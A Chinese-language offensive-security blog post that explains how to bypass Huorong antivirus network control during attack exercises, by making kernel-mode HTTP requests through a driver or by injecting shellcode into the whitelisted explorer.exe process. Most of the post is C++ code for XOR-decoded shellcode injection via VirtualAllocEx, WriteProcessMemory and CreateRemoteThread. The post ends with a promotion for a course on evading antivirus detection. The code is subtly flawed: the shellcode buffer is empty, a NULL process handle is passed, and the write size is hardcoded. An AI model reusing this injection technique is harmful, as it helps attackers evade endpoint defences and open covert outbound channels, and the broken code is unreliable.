在攻防演练过程中本人多次遇到防守人员应急或者研发、运维等人员安全意识较高开启火绒联网控制在阻止目标机器出网。
这里给出两种方案:
使用Driver进行Bypass
注入系统核心进程
这种方案实现起来较难且兼容性不高,但核心其实就是Github中一个开源库:
https://github.com/send010/KernelHttp
这个库可以让你在R0下便捷的发起HTTP请求。在配合我之前写过的一篇文章来加载驱动:
http://www.pentester.top/index.php/archives/115/
我们注意到在联网控制的默认设置中会存在自动放行Windows核心程序:
那么我们只需要去测试哪些程序被火绒认为是Windows核心程序在注入shellcode到目标程序中就可以了,代码如下:
#include <windows.h>
#include <tlhelp32.h>
#include <iostream>
using namespace std;
void main(int argv,char** argc) {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
if (Process32First(snapshot, &entry) == TRUE)
{
while (Process32Next(snapshot, &entry) == TRUE)
{
if (stricmp(entry.szExeFile, "explorer.exe") == 0)
{
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, true, entry.th32ProcessID);
if (hProcess == NULL) {
cout << "[-] 进程句柄打开失败!" << endl;
return;
}
cout << "[+] 进程句柄打开成功!" << hex << hProcess << endl;
BYTE Buffer[] = { };
BYTE Buffer2[sizeof(Buffer)] = { 0 };
for (int i = 0; i < sizeof(Buffer); i++) {
int x = Buffer[i] ^ 0xd;
Buffer2[i] = x;
printf("%x,", Buffer2[i]);
}
LPVOID pBuf = VirtualAllocEx(NULL, NULL, sizeof(Buffer2), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pBuf) {
cout << "[-] 内存申请失败" << endl;
CloseHandle(hProcess);
return;
}
cout << "[+] 内存申请成功,Address:" << hex << pBuf << endl;
SIZE_T dwWrite = 0;
if (!WriteProcessMemory(hProcess, pBuf, Buffer2, 1477, &dwWrite))
{
cout << "[-] 内存写入失败" << endl;
CloseHandle(hProcess);
return;
}
cout << "[+] 内存写入成功" << endl;
getchar();
HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, NULL,
(LPTHREAD_START_ROUTINE)pBuf, NULL, 0, 0);
if (!hRemoteThread) {
cout << "[-] 创建远程线程失败!" << GetLastError() << endl;
return;
}
cout << "[+] 线程ID:" << hRemoteThread << endl;
WaitForSingleObject(hRemoteThread, -1);
CloseHandle(hRemoteThread);
CloseHandle(hProcess);
VirtualFreeEx(hProcess, pBuf, 0, MEM_FREE);
CloseHandle(hProcess);
}
}
}
CloseHandle(snapshot);
}
该课程仅适合免杀入门,有基础的请不要购买
https://edu.csdn.net/course/detail/37761